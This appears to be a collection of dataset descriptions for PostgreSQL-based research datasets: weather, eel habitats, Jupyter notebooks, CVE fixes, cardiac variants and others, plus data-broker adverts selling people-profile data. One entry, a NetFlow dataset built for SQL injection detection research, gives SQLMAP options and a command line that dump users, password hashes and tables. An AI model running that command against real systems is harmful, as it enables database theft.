Attribution 4.0 (CC BY 4.0) https://creativecommons.org/licenses/by/4.0/
License information was derived automatically
This database contains ten-minute rainfall, humidity, temperature, global solar radiation, wind velocity and wind direction data from 150 stations of the MeteoGalicia network between 1 January 2000 and 31 December 2018.
Version installed: postgresql 9.1
Extension installed: postgis 1.5.3-1
Instructions to restore the database:
createdb -E UTF8 -O postgres -U postgres template_postgis
createlang plpgsql -d template_postgis -U postgres
psql -d template_postgis -U postgres -f /usr/share/postgresql/9.1/contrib/postgis-1.5/postgis.sql
psql -d template_postgis -U postgres -f /usr/share/postgresql/9.1/contrib/postgis-1.5/spatial_ref_sys.sql
psql -d template_postgis -U postgres -f /usr/share/postgresql/9.1/contrib/postgis_comments.sql
createdb -U postgres -T template_postgis MeteoGalicia
cat Meteogalicia* | psql MeteoGalicia
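As an optional sanity check after the restore (assuming the same postgres superuser as above), you can confirm that PostGIS is available in the new database and list the loaded tables:
psql -d MeteoGalicia -U postgres -c "SELECT postgis_version();"
psql -d MeteoGalicia -U postgres -c "\dt"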
Attribution 4.0 (CC BY 4.0) https://creativecommons.org/licenses/by/4.0/
License information was derived automatically
An example sample sheet containing sample information that is used to start an analysis in VarGenius (TSV, 330 bytes).
Attribution 4.0 (CC BY 4.0) https://creativecommons.org/licenses/by/4.0/
License information was derived automatically
DESCRIPTION
VERSIONS
version 1.0.1 fixes a problem with functions
version 1.0.2 adds table dbeel_rivers.rn_rivermouth with GEREM basin, distance to Gibraltar and link to CCM
version 1.0.3 fixes a problem with functions
version 1.0.4 adds views rn_rna and rn_rne to the database
The SUDOANG project aims at providing common tools to managers to support eel conservation in the SUDOE area (Spain, France and Portugal). VISUANG is the SUDOANG Interactive Web Application that hosts all these tools. The application consists of an eel distribution atlas (GT1), assessments of mortalities caused by turbines and an atlas showing obstacles to migration (GT2), estimates of recruitment and exploitation rate (GT3) and escapement (chosen as a target by the EC for the Eel Management Plans) (GT4). In addition, it includes an interactive map showing sampling results from the pilot basin network produced by GT6.
The eel abundance for the eel atlas and escapement has been obtained using the Eel Density Analysis model (EDA, GT4's product). EDA extrapolates the abundance of eel in sampled river segments to other segments taking into account how the abundance, sex and size of the eels change depending on different parameters. Thus, EDA requires two main data sources: those related to the river characteristics and those related to eel abundance and characteristics.
However, in both cases, data availability was uneven in the SUDOE area. In addition, this information was dispersed among several managers and in different formats due to the different sampling sources: Water Framework Directive (WFD), Community Framework for the Collection, Management and Use of Data in the Fisheries Sector (EUMAP), Eel Management Plans, research groups, scientific papers and technical reports. Therefore, the first step towards eel abundance estimations covering the whole SUDOE area was to build a joint river and eel database. In this report we describe the database covering the river characteristics in the SUDOE area and the eel abundances and their characteristics.
In the case of rivers, two types of information have been collected:
River topology (RN table): a compilation of data on rivers and their topological and hydrographic characteristics in the three countries.
River attributes (RNA table): contains physical attributes that have fed the SUDOANG models.
The estimation of eel abundance and characteristics (size, biomass, sex-ratio and silver) distribution at different scales (river segment, basin, Eel Management Unit (EMU) and country) in the SUDOE area, obtained with the implementation of the EDA2.3 model, has been compiled in the RNE table (eel predictions).
CURRENT ACTIVE PROJECT
The project is currently active here: gitlab forgemia.
TECHNICAL DESCRIPTION TO BUILD THE POSTGRES DATABASE
All tables are in EPSG:3035 (European LAEA). The format is a PostgreSQL database. You can download other formats (shapefiles, CSV) here: SUDOANG gt1 database.
Initial command
cd c:/path/to/my/folder
createdb -U postgres eda2.3
psql -U postgres eda2.3
Within the psql command
create extension "postgis"; create extension "dblink"; create extension "ltree"; create extension "tablefunc"; create schema dbeel_rivers; create schema france; create schema spain; create schema portugal; -- type \q to quit the psql shell
Now the database is ready to receive the different dumps. The dump files are large; you might not need the parts including unit basins or waterbodies. All the tables except waterbodies and unit basins are described in the Atlas. You might need to understand what inheritance is in a database: https://www.postgresql.org/docs/12/tutorial-inheritance.html
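As a minimal illustration of how inheritance plays out here (assuming, which is not stated explicitly above, that france.rn, spain.rn and portugal.rn inherit from dbeel_rivers.rn), a query on the parent table also returns the rows stored in its children:
-- querying the parent returns rows from all inheriting country tables
SELECT country, count(*) FROM dbeel_rivers.rn GROUP BY country;
-- ONLY restricts the query to rows stored directly in the parent table
SELECT count(*) FROM ONLY dbeel_rivers.rn;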
These layers contain the topology (see Atlas for detail)
dbeel_rivers.rn
france.rn
spain.rn
portugal.rn
Columns (see Atlas)
gid
idsegment
source
target
lengthm
nextdownidsegment
path
isfrontier
issource
seaidsegment
issea
geom
isendoreic
isinternational
country
dbeel_rivers.rn_rivermouth
seaidsegment
geom (polygon)
gerem_zone_3
gerem_zone_4 (used in EDA)
gerem_zone_5
ccm_wso_id
country
emu_name_short
geom_outlet (point)
name_basin
dist_from_gibraltar_km
name_coast
basin_name
pg_restore -U postgres -d eda2.3 "dbeel_rivers.rn.backup"
pg_restore -U postgres -d eda2.3 "france.rn.backup"
pg_restore -U postgres -d eda2.3 "spain.rn.backup"
pg_restore -U postgres -d eda2.3 "portugal.rn.backup"
The dbeel_rivers.rn_rivermouth table holds one row for each basin flowing to the sea.
pg_restore -U postgres -d eda2.3 "dbeel_rivers.rn_rivermouth.backup"
psql -U postgres -d eda2.3 -f "function_dbeel_rivers.sql"
This corresponds to tables
dbeel_rivers.rna
france.rna
spain.rna
portugal.rna
Columns (see Atlas)
idsegment
altitudem
distanceseam
distancesourcem
cumnbdam
medianflowm3ps
surfaceunitbvm2
surfacebvm2
strahler
shreeve
codesea
name
pfafriver
pfafsegment
basin
riverwidthm
temperature
temperaturejan
temperaturejul
wettedsurfacem2
wettedsurfaceotherm2
lengthriverm
emu
cumheightdam
riverwidthmsource
slope
dis_m3_pyr_riveratlas
dis_m3_pmn_riveratlas
dis_m3_pmx_riveratlas
drought
drought_type_calc
Code:
pg_restore -U postgres -d eda2.3 "dbeel_rivers.rna.backup"
pg_restore -U postgres -d eda2.3 "france.rna.backup"
pg_restore -U postgres -d eda2.3 "spain.rna.backup"
pg_restore -U postgres -d eda2.3 "portugal.rna.backup"
These layers contain eel data (see Atlas for detail)
dbeel_rivers.rne
france.rne
spain.rne
portugal.rne
Columns (see Atlas)
idsegment
surfaceunitbvm2
surfacebvm2
delta
gamma
density
neel
beel
peel150
peel150300
peel300450
peel450600
peel600750
peel750
nsilver
bsilver
psilver150300
psilver300450
psilver450600
psilver600750
psilver750
psilver
pmale150300
pmale300450
pmale450600
pfemale300450
pfemale450600
pfemale600750
pfemale750
pmale
pfemale
sex_ratio
cnfemale300450
cnfemale450600
cnfemale600750
cnfemale750
cnmale150300
cnmale300450
cnmale450600
cnsilver150300
cnsilver300450
cnsilver450600
cnsilver600750
cnsilver750
cnsilver
delta_tr
gamma_tr
type_fit_delta_tr
type_fit_gamma_tr
density_tr
density_pmax_tr
neel_pmax_tr
nsilver_pmax_tr
density_wd
neel_wd
beel_wd
nsilver_wd
bsilver_wd
sector_tr
year_tr
is_current_distribution_area
is_pristine_distribution_area_1985
Code for restoration
pg_restore -U postgres -d eda2.3 "dbeel_rivers.rne.backup"
pg_restore -U postgres -d eda2.3 "france.rne.backup"
pg_restore -U postgres -d eda2.3 "spain.rne.backup"
pg_restore -U postgres -d eda2.3 "portugal.rne.backup"
Unit basins are not described in the Atlas. They correspond to the following tables:
dbeel_rivers.basinunit_bu
france.basinunit_bu
spain.basinunit_bu
portugal.basinunit_bu
france.basinunitout_buo
spain.basinunitout_buo
portugal.basinunitout_buo
The unit basin is the simple basin that surrounds a segment. It corresponds to the topographic unit from which the unit segments have been calculated (EPSG:3035). Tables bu_unitbv and bu_unitbvout inherit from dbeel_rivers.unit_bv. The first table intersects with a segment; the second does not, and corresponds to basin polygons which do not have a river segment.
Source:
Portugal
France
In France, the unit basins correspond to the RHT (Pella et al., 2012).
Spain
pg_restore -U postgres -d eda2.3 'dbeel_rivers.basinunit_bu.backup'
pg_restore -U postgres -d eda2.3
LinkDB is an exhaustive dataset of publicly accessible LinkedIn people and companies, containing close to 500M people & companies profiles by region.
LinkDB is updated up to millions of profiles daily at the point of purchase. Post-purchase, you can keep LinkDB updated quarterly for a nominal fee.
Data is shipped in Apache Parquet, a column-oriented data file format.
All our data and procedures meet major legal compliance requirements such as GDPR and CCPA. We help you be compliant too.
Attribution 4.0 (CC BY 4.0) https://creativecommons.org/licenses/by/4.0/
License information was derived automatically
The self-documenting aspects and the ability to reproduce results have been touted as significant benefits of Jupyter Notebooks. At the same time, there has been growing criticism that the way notebooks are being used leads to unexpected behavior, encourages poor coding practices and that their results can be hard to reproduce. To understand good and bad practices used in the development of real notebooks, we analyzed 1.4 million notebooks from GitHub. Based on the results, we proposed and evaluated Julynter, a linting tool for Jupyter Notebooks.
Papers:
This repository contains three files:
Reproducing the Notebook Study
The db2020-09-22.dump.gz file contains a PostgreSQL dump of the database, with all the data we extracted from notebooks. For loading it, run:
gunzip -c db2020-09-22.dump.gz | psql jupyter
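If the jupyter database does not exist yet, it has to be created first; a minimal hedged sequence (assuming a local PostgreSQL server and a role allowed to create databases) is:
createdb jupyter
gunzip -c db2020-09-22.dump.gz | psql jupyter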
Note that this file contains only the database with the extracted data. The actual repositories are available in a Google Drive folder, which also contains the Docker images we used in the reproducibility study. The repositories are stored as content/{hash_dir1}/{hash_dir2}.tar.bz2, where hash_dir1 and hash_dir2 are columns of repositories in the database.
For scripts, notebooks, and detailed instructions on how to analyze or reproduce the data collection, please check the instructions on the Jupyter Archaeology repository (tag 1.0.0)
The sample.tar.gz file contains the repositories obtained during the manual sampling.
Reproducing the Julynter Experiment
The julynter_reproducility.tar.gz file contains all the data collected in the Julynter experiment and the analysis notebooks. Reproducing the analysis is straightforward:
The collected data is stored in the julynter/data folder.
Changelog
2019/01/14 - Version 1 - Initial version
2019/01/22 - Version 2 - Update N8.Execution.ipynb to calculate the rate of failure for each reason
2019/03/13 - Version 3 - Update package for camera ready. Add columns to db to detect duplicates, change notebooks to consider them, and add N1.Skip.Notebook.ipynb and N11.Repository.With.Notebook.Restriction.ipynb.
2021/03/15 - Version 4 - Add Julynter experiment; Update database dump to include new data collected for the second paper; remove scripts and analysis notebooks from this package (moved to GitHub), add a link to Google Drive with collected repository files
The Forager.ai Global Dataset is a leading source of firmographic data, backed by advanced AI and offering the highest refresh rate in the industry.
| Volume and Stats |
| Use Cases |
Sales Platforms, ABM and Intent Data Platforms, Identity Platforms, Data Vendors:
Example applications include:
Uncover trending technologies or tools gaining popularity.
Pinpoint lucrative business prospects by identifying similar solutions utilized by a specific company.
Study a company's tech stacks to understand the technical capability and skills available within that company.
B2B Tech Companies:
Venture Capital and Private Equity:
| Delivery Options |
Our dataset provides a unique blend of volume, freshness, and detail that is perfect for Sales Platforms, B2B Tech, VCs & PE firms, Marketing Automation, ABM & Intent. It stands as a cornerstone in our broader data offering, ensuring you have the information you need to drive decision-making and growth.
Tags: Company Data, Company Profiles, Employee Data, Firmographic Data, AI-Driven Data, High Refresh Rate, Company Classification, Private Market Intelligence, Workforce Intelligence, Public Companies.
This example demonstrates how to use PostGIS capabilities in the CyberGIS-Jupyter notebook environment. Modified from a notebook by Weiye Chen (weiyec2@illinois.edu).
PostGIS is an extension to the PostgreSQL object-relational database system which allows GIS (Geographic Information Systems) objects to be stored in the database. PostGIS includes support for GiST-based R-Tree spatial indices, and functions for analysis and processing of GIS objects.
Resources for PostGIS:
Manual: https://postgis.net/docs/
In this demo, we use PostGIS 3.0. Note that significant API changes have been made in PostGIS 3.0 compared to version 2.x. This demo assumes that you have basic knowledge of SQL.
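As a brief, hedged illustration of the kind of operations covered in the demo (the table name places and the coordinates are made up for this sketch, not part of the original notebook), PostGIS can be enabled and queried with standard SQL:
CREATE EXTENSION IF NOT EXISTS postgis;
SELECT postgis_full_version();
-- hypothetical example table holding point geometries in WGS84
CREATE TABLE places (id serial PRIMARY KEY, name text, geom geometry(Point, 4326));
INSERT INTO places (name, geom) VALUES ('campus', ST_SetSRID(ST_MakePoint(-88.2272, 40.1106), 4326));
SELECT name, ST_AsText(geom) FROM places;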
Attribution 4.0 (CC BY 4.0) https://creativecommons.org/licenses/by/4.0/
License information was derived automatically
This occurrence dataset provides primary data on repeated tree measurement of two inventories on the permanent sampling plot (8.8 ha) established in the old-growth polydominant broadleaved forest stand in the “Kaluzhskie Zaseki” State Nature Reserve (center of the European part of the Russian Federation). The time span between the inventories was 30 years, and a total of more than 11 000 stems were included in the study (11 tree species and 3 genera). During the measurements, the tree species (for some trees only the genus was determined), stem diameter at breast height of 1.3 m (DBH), and life status were recorded for every individual stem, and some additional attributes were determined for some trees. Field data were digitized and compiled into a PostgreSQL database. Deep data cleaning and validation (with documentation of changes) was performed before data standardization according to the Darwin Core standard.
Primary data are presented from two tree censuses carried out on a permanent sampling plot (8.8 ha) established in an old-growth polydominant broadleaved forest in the “Kaluzhskie Zaseki” Nature Reserve. The censuses were carried out 30 years apart, and more than 11 000 recording units were studied in total (trees of 11 species and 3 genera). For each recording unit, the species, diameter at a height of 1.3 m and status were determined; additional characteristics were also measured for some trees. All field data were digitized and organized into a PostgreSQL database. Before standardizing the data according to Darwin Core, they were thoroughly checked, and all changes made were documented.
This is a dump generated by pg_dump -Fc of the IMDb data used in the "How Good are Query Optimizers, Really?" paper. PostgreSQL compatible SQL queries and scripts to automatically create a VM with this dataset can be found here: https://git.io/imdb
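Because the dump was produced with pg_dump -Fc (custom format), it is restored with pg_restore rather than plain psql. A minimal sketch, assuming the dump file is named imdb.dump and a local postgres superuser:
createdb -U postgres imdb
pg_restore -U postgres -d imdb imdb.dump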
As of June 2024, the most popular database management system (DBMS) worldwide was Oracle, with a ranking score of *******; MySQL and Microsoft SQL Server rounded out the top three. Although the database management industry contains some of the largest companies in the tech industry, such as Microsoft, Oracle and IBM, a number of free and open-source DBMSs such as PostgreSQL and MariaDB remain competitive.
Database Management Systems
As the name implies, DBMSs provide a platform through which developers can organize, update, and control large databases. Given the business world’s growing focus on big data and data analytics, knowledge of SQL programming languages has become an important asset for software developers around the world, and database management skills are seen as highly desirable. In addition to providing developers with the tools needed to operate databases, DBMSs are also integral to the way that consumers access information through applications, which further illustrates the importance of the software.
MIT License https://opensource.org/licenses/MIT
License information was derived automatically
In our work, we have designed and implemented a novel workflow with several heuristic methods to combine state-of-the-art methods for gathering CVE fix commits. As a consequence of our improvements, we have been able to gather the largest programming-language-independent real-world dataset of CVE vulnerabilities with the associated fix commits. Our dataset, containing 29,203 unique CVEs coming from 7,238 unique GitHub projects, is, to the best of our knowledge, by far the biggest CVE vulnerability dataset with fix commits available today. These CVEs are associated with 35,276 unique commits stored as SQL and 39,931 patch commit files that fixed those vulnerabilities (some patch files cannot be saved as SQL due to several technical reasons). Our larger dataset thus substantially improves over the current real-world vulnerability datasets and enables further progress in research on vulnerability detection and software security. We used NVD (nvd.nist.gov) and the GitHub Security Advisory Database as the main sources of our pipeline.
We release to the community a 16GB PostgreSQL database that contains information on CVEs up to 2024-09-26, CWEs of each CVE, files and methods changed by each commit, and repository metadata. Additionally, patch files related to the fix commits are available as a separate package. Furthermore, we make our dataset collection tool also available to the community.
The cvedataset-patches.zip file contains the fix patches, and postgrescvedumper.sql.zip contains a PostgreSQL dump of the fixes, together with several other fields such as CVEs, CWEs, repository metadata, commit data, file changes, methods changed, etc.
The MoreFixes data-storage strategy is based on CVEFixes to store CVE fix commits from open-source repositories, and uses a modified version of Prospector (part of Project KB from SAP) as a module to detect the fix commits of a CVE. Our full methodology is presented in the paper "MoreFixes: A Large-Scale Dataset of CVE Fix Commits Mined through Enhanced Repository Discovery", which will be published at the PROMISE conference (2024).
For more information about usage and sample queries, visit the Github repository: https://github.com/JafarAkhondali/Morefixes
If you are using this dataset, please be aware that the repositories we mined have different licenses and you are responsible for handling any licensing issues. The same also applies to CVEFixes.
This product uses the NVD API but is not endorsed or certified by the NVD.
This research was partially supported by the Dutch Research Council (NWO) under the project NWA.1215.18.008 Cyber Security by Integrated Design (C-SIDe).
To restore the dataset, you can use the docker-compose file available at the GitHub repository. Default database credentials after restoring the dump:
POSTGRES_USER=postgrescvedumper POSTGRES_DB=postgrescvedumper POSTGRES_PASSWORD=a42a18537d74c3b7e584c769152c3d
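Once the containers are up and the dump has been restored, a quick hedged check (assuming the default PostgreSQL port 5432 is exposed on localhost) is to connect with the credentials above and list the tables:
psql -h localhost -p 5432 -U postgrescvedumper -d postgrescvedumper -c "\dt"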
Please use this for citation:
title={MoreFixes: A large-scale dataset of CVE fix commits mined through enhanced repository discovery},
author={Akhoundali, Jafar and Nouri, Sajad Rahim and Rietveld, Kristian and Gadyatskaya, Olga},
booktitle={Proceedings of the 20th International Conference on Predictive Models and Data Analytics in Software Engineering},
pages={42--51},
year={2024}
}
Forager.ai's Small Business Contact Data set is a comprehensive collection of over 695M professional profiles. With an unmatched 2x/month refresh rate, we ensure the most current and dynamic data in the industry today. We deliver this data via JSONL flat-files or PostgreSQL database delivery, capturing publicly available information on each profile.
| Volume and Stats |
Every single record refreshed 2x per month, setting industry standards. First-party data curation powering some of the most renowned sales and recruitment platforms. Delivery frequency is hourly (fastest in the industry today). Additional datapoints and linkages available. Delivery formats: JSONL, PostgreSQL, CSV.
| Datapoints |
Over 150+ unique datapoints available! Key fields like Current Title, Current Company, Work History, Educational Background, Location, Address, and more. Unique linkage data to other social networks or contact data available.
| Use Cases |
Sales Platforms, ABM Vendors, Intent Data Companies, AdTech and more:
Deliver the best end-customer experience with our people feed powering your solution! Be the first to know when someone changes jobs and share that with end-customers. Industry-leading data accuracy. Connect our professional records to your existing database, find new connections to other social networks, and contact data. Hashed records also available for advertising use-cases.
Venture Capital and Private Equity:
Track every company and employee with a publicly available profile. Keep track of your portfolio's founders, employees and ex-employees, and be the first to know when they move or start up. Keep an eye on the pulse by following the most influential people in the industries and segments you care about. Provide your portfolio companies with the best data for recruitment and talent sourcing. Review departmental headcount growth of private companies and benchmark their strength against competitors.
HR Tech, ATS Platforms, Recruitment Solutions, as well as Executive Search Agencies:
Build products for industry-specific and industry-agnostic candidate recruiting platforms. Track person job changes and immediately refresh profiles to avoid stale data. Identify ideal candidates through work experience and education history. Keep ATS systems and candidate profiles constantly updated. Link data from this dataset into GitHub, LinkedIn, and other social networks.
| Delivery Options |
Flat files via S3 or GCP
PostgreSQL Shared Database
PostgreSQL Managed Database
REST API
Other options available at request, depending on scale required
| Other key features |
Over 120M US Professional Profiles. 150+ Data Fields (available upon request). Free data samples and evaluation.
Tags: Professionals Data, People Data, Work Experience History, Education Data, Employee Data, Workforce Intelligence, Identity Resolution, Talent, Candidate Database, Sales Database, Contact Data, Account Based Marketing, Intent Data.
The Forager.ai Global Private Equity (PE) Funding Data Set is a leading source of firmographic data, backed by advanced AI and offering the highest refresh rate in the industry.
| Volume and Stats |
| Use Cases |
Sales Platforms, ABM and Intent Data Platforms, Identity Platforms, Data Vendors:
Example applications include:
Uncover trending technologies or tools gaining popularity.
Pinpoint lucrative business prospects by identifying similar solutions utilized by a specific company.
Study a company's tech stacks to understand the technical capability and skills available within that company.
B2B Tech Companies:
Venture Capital and Private Equity:
| Delivery Options |
Our dataset provides a unique blend of volume, freshness, and detail that is perfect for Sales Platforms, B2B Tech, VCs & PE firms, Marketing Automation, ABM & Intent. It stands as a cornerstone in our broader data offering, ensuring you have the information you need to drive decision-making and growth.
Tags: Company Data, Company Profiles, Employee Data, Firmographic Data, AI-Driven Data, High Refresh Rate, Company Classification, Private Market Intelligence, Workforce Intelligence, Public Companies.
Introduction
This dataset contains SQL injection attacks (SQLIA) as malicious NetFlow data. The attacks carried out are SQL injection for Union Query and Blind SQL injection. To perform the attacks, the SQLMAP tool has been used. NetFlow traffic was generated using DOROTHEA (DOcker-based fRamework fOr gaTHering nEtflow trAffic). NetFlow is a network protocol developed by Cisco for the collection and monitoring of network traffic flow data. A flow is defined as a unidirectional sequence of packets with some common properties that pass through a network device.
Datasets
The first dataset was collected to train the detection models (D1) and the other was collected using different attacks than those used in training, to test the models and ensure their generalization (D2). The datasets contain both benign and malicious traffic. All collected datasets are balanced. The version of NetFlow used to build the datasets is 5.
D1: Training, 400,003 samples, 50% benign-malicious traffic ratio
D2: Test, 57,239 samples, 50% benign-malicious traffic ratio
Infrastructure and implementation
Two sets of flow data were collected with DOROTHEA. DOROTHEA is a Docker-based framework for NetFlow data collection. It allows you to build interconnected virtual networks to generate and collect flow data using the NetFlow protocol. In DOROTHEA, network traffic packets are sent to a NetFlow generator that has the sensor ipt_netflow installed. The sensor consists of a module for the Linux kernel using Iptables, which processes the packets and converts them to NetFlow flows. DOROTHEA is configured to use NetFlow v5 and export a flow after it has been inactive for 15 seconds or after the flow has been active for 1800 seconds (30 minutes).
Benign traffic generation nodes simulate network traffic generated by real users, performing tasks such as searching in web browsers, sending emails, or establishing Secure Shell (SSH) connections. Such tasks run as Python scripts. Users may customize them or even incorporate their own. The network traffic is managed by a gateway that performs two main tasks. On the one hand, it routes packets to the Internet. On the other hand, it sends them to a NetFlow data generation node (this process is carried out similarly for packets received from the Internet).
The malicious traffic (SQLIA attacks) was generated using SQLMAP. SQLMAP is a penetration testing tool used to automate the process of detecting and exploiting SQL injection vulnerabilities. The attacks were executed on 16 nodes, each launching SQLMAP with the following parameters:
'--banner','--current-user','--current-db','--hostname','--is-dba','--users','--passwords','--privileges','--roles','--dbs','--tables','--columns','--schema','--count','--dump','--comments','--schema': Enumerate users, password hashes, privileges, roles, databases, tables and columns
--level=5: Increase the probability of a false positive identification
--risk=3: Increase the probability of extracting data
--random-agent: Select the User-Agent randomly
--batch: Never ask for user input, use the default behavior
--answers="follow=Y": Predefined answers to yes
Every node executed SQLIA on 200 victim nodes. The victim nodes had deployed a web form vulnerable to Union-type injection attacks, which was connected to the MySQL or SQLServer database engines (50% of the victim nodes deployed MySQL and the other 50% deployed SQLServer). The web service was accessible from ports 443 and 80, which are the ports typically used to deploy web services. The IP address space was 182.168.1.1/24 for the benign and malicious traffic-generating nodes. For victim nodes, the address space was 126.52.30.0/24.
The malicious traffic in the test sets was collected under different conditions. For D1, SQLIA was performed using Union attacks on the MySQL and SQLServer databases. However, for D2, Blind SQL injection attacks were performed against the web form connected to a PostgreSQL database. The IP address spaces of the networks were also different from those of D1. In D2, the IP address space was 152.148.48.1/24 for benign and malicious traffic-generating nodes and 140.30.20.1/24 for victim nodes. To run the MySQL server we used MariaDB version 10.4.12.
Microsoft SQL Server 2017 Express and PostgreSQL version 13 were used.
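For illustration only, a single attack node invoking SQLMAP with the parameters listed above would look roughly like this; the target URL is a hypothetical placeholder for one of the vulnerable victim web forms:
sqlmap -u "http://victim-node/form?id=1" --banner --current-user --current-db --hostname --is-dba --users --passwords --privileges --roles --dbs --tables --columns --schema --count --dump --comments --level=5 --risk=3 --random-agent --batch --answers="follow=Y"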
Spider 2.0 is a comprehensive code generation agent task that includes 632 examples. The agent has to interactively explore various types of databases, such as BigQuery, Snowflake, Postgres, ClickHouse, DuckDB, and SQLite. It is required to engage with complex SQL workflows, process extensive contexts, perform intricate reasoning, and generate multiple SQL queries with diverse operations, often exceeding 100 lines across multiple interactions.
Location of RYR2 Associated CPVT Variants Dataset
Catecholaminergic polymorphic ventricular tachycardia (CPVT) is a rare inherited arrhythmia caused by pathogenic RYR2 variants. CPVT is characterized by exercise/stress-induced syncope and cardiac arrest in the absence of resting ECG and structural cardiac abnormalities.
Here, we present a database collected from 221 clinical papers, published from 2001 to October 2020, about CPVT-associated RYR2 variants. The database contains 1342 patients with RYR2 variants, both with and without CPVT. There are a total of 964 CPVT patients or suspected CPVT patients in the database. The database includes information regarding genetic diagnosis, location of the RYR2 variant(s), clinical history and presentation, and treatment strategies for each patient. Patients will have a varying depth of information in each of the provided fields.
Database website: https://cpvtdb.port5000.com/
Dataset Information
This dataset includes:
all_data.xlsx
Tabular version of the database
Most relevant tables in the PostgreSQL database regarding patient sex, conditions, treatments, family history, and variant information were joined to create this database
Views calculating the affected RYR2 exons, domains and subdomains have been joined to patient information
m-n tables for patients' conditions and treatments have been converted to pivot tables: every condition and treatment that has at least one person with that condition or treatment is a column.
NOTE: This was created using a LEFT JOIN of individuals and individual_variants tables. Individuals with more than 1 recorded variant will be listed on multiple rows.
There is only 1 patient in this database with multiple recorded variants (all intronic)
20241219-dd040736b518.sql.gz
PostgreSQL database dump
Expands to about 200MB after loading the database dump
The database includes two schemas:
public: Includes all information in patients and variants
Also includes all RYR2 variants in ClinVar
uta: Contains the rows from biocommons/uta database required to make the hgvs Python package validate RYR2 variants
See https://github.com/biocommons/uta for more information
NOTE: It is recommended to use this version of the database only for development or analysis purposes
database_tables.pdf
Contains information on most of the database tables and columns in the public schema
00_globals.sql
Required to load the PostgreSQL database dump
How To Load Database Using Docker
First, download the 00_globals.sql file and the .sql.gz database dump and move them into a directory. The default postgres image will load files from the /docker-entrypoint-initdb.d directory if the database is empty. See Docker Hub for more information. Mount the directory with the files into /docker-entrypoint-initdb.d.
Example using docker compose with pgadmin and a volume to persist the data.
volumes:
  mydatabasevolume: null
services:
  db:
    image: postgres:16
    restart: always
    environment:
      POSTGRES_PASSWORD: mysecretpassword
      POSTGRES_USER: postgres
    volumes:
      - ':/docker-entrypoint-initdb.d/'
      - 'mydatabasevolume:/var/lib/postgresql/data'
    ports:
      - 5432:5432
  pgadmin:
    image: dpage/pgadmin4
    environment:
      PGADMIN_DEFAULT_EMAIL: user@domain.com
      PGADMIN_DEFAULT_PASSWORD: SuperSecret
    ports:
      - 8080:80
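Assuming the compose file above is saved as docker-compose.yml in the same directory as 00_globals.sql and the .sql.gz dump, the stack can be started (and the dump loaded on first run) with:
docker compose up -d
pgAdmin is then reachable at http://localhost:8080 and the database at localhost:5432, matching the ports published above.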
Analysis Code
See https://github.com/alexdaiii/cpvt_database_analysis for source code to create the xlsx file and analysis of the data.
Changelist
v0.3.0
Removed inaccessible publications
Updated publications to include information on what type of publication it is (e.g. Original Article, Abstract, Review, etc.)
v0.2.1
Updated all_patients.xlsx -> all_data.xlsx
Corrected how the data from all the patient's conditions, diseases, treatments, and the patients' variants tables are joined
Attribution 4.0 (CC BY 4.0) https://creativecommons.org/licenses/by/4.0/
License information was derived automatically
The Eurasian Modern Pollen Database (EMPD) contains modern pollen data (raw counts) for the entire Eurasian continent. Derived from the European Modern Pollen Database, the dataset contains many more samples West of the Ural Mountains. We propose this dataset in three different formats: 1/ an Excel spreadsheet, 2/ a PostgreSQL dump and 3/ a SQLite3 portable database format. All three datasets are strictly equivalent. For download see "Original Version".
Attribution 4.0 (CC BY 4.0) https://creativecommons.org/licenses/by/4.0/
License information was derived automatically
These datasets were created as part of a study involving an experiment with a helpdesk team at an international software company. The goal was to implement an automated performance appraisal model that evaluates the team based on issue reports and key features derived from classifying the messages exchanged with the customers using Dialog Acts. The data was extracted from a PostgreSQL database and curated to present aggregated views of helpdesk tickets reported between January 2016 and March 2023. Certain fields have been anonymized (masked) to protect the data owner’s privacy while preserving the overall meaning of the information. The datasets are:
- issues.csv Holds information for all reported tickets, showing the category, priority, who reported the issue, the related project, who was assigned to resolve the ticket, the start time, the resolution time, and how many seconds the ticket spent in each resolution step.
- issues_change_history.csv Shows when the ticket assignee and status were changed. This dataset helps calculate the time spent on each step.
- issues_snapshots.csv Contains the same records as issues.csv but duplicates the tickets that were handled by multiple assignees; each record is the processing cycle per assignee.
- scored_issues_snapshot_sample.xlsx A stratified and representative sample extracted from the tickets and then handed to an annotator (the helpdesk manager) to appraise the resolution performance against three targets, where 5 is the highest score and 1 is the lowest.
- sample_utterances.csv Contains the messages (comments) that were exchanged between the reporters and the helpdesk team. This dataset only contains the curated messages for the issues listed in scored_issues_snapshot_sample.xlsx, as those were the focus of the initial study.
The following files are guidelines on how to work with and interpret the datasets:
- FEATURES.md Describes the dataset features (fields).
- EXAMPLE.md Shows an example of an issue in all datasets so the reader can understand the relations between them.
- process-flow.png A demonstration of the steps followed by the helpdesk team to resolve an issue.
These datasets are valuable for many other experiments, such as:
- Count Predictions
- Regression
- Association rules mining
- Natural Language Processing
- Classification
- Clustering
Attribution 4.0 (CC BY 4.0) https://creativecommons.org/licenses/by/4.0/
License information was derived automatically
This collection includes a standard data model and an Excel template for representing whole-rock samples and their geochemical data of mineralised spodumene pegmatites. The data model has been implemented in PostgreSQL v13, a relational database system. The dump file comprises SQL statements which can be executed to reproduce the original database table definitions and their relations. The template provides common structures to streamline data and metadata entry. These components are crucial for compiling diverse whole-rock geochemical data from different sources, such as existing literature and projects in CSIRO Mineral Resources, into a global database. This database can then be used for comparison studies and exploratory analysis.
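As a hedged sketch of how such a plain-SQL dump is typically loaded with psql (the database name pegmatite_geochem and the dump filename are placeholders, not names taken from this collection):
createdb -U postgres pegmatite_geochem
psql -U postgres -d pegmatite_geochem -f spodumene_wholerock_dump.sql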
The EMODnet Vessel Density Maps were created by Cogea in 2019 in the framework of EMODnet Human Activities, an initiative funded by the EU Commission. The maps are based on AIS data purchased from CLS and show shipping density in 1km*1km cells of a grid covering all EU waters (and some neighbouring areas). Density is expressed as hours per square kilometre per month.
A set of AIS data had to be purchased from CLS, a commercial provider. The data consists of messages sent by the automatic tracking systems installed on board ships and received by terrestrial and satellite receivers alike. The dataset covers the whole of 2017 for an area covering all EU waters. A partial pre-processing of the data was carried out by CLS: (i) The only AIS messages delivered were the ones relevant for assessing shipping activities (AIS messages 1, 2, 3, 18 and 19). (ii) The AIS data were down-sampled to 3 minutes. (iii) Duplicate signals were removed. (iv) Wrong MMSI signals were removed. (v) Special characters and diacritics were removed. (vi) Signals with erroneous speed over ground (SOG) were removed (negative values or more than 80 knots). (vii) Signals with erroneous course over ground (COG) were removed (negative values or more than 360 degrees). (viii) A Kalman filter was applied to remove satellite noise. The Kalman filter was based on a correlated random walk fine-tuned for ship behaviour. The consistency of a new observation with the modelled position is checked against key performance indicators such as innovation, likelihood and speed. (ix) A footprint filter was applied to check for satellite AIS data consistency. All positions which were not compliant with 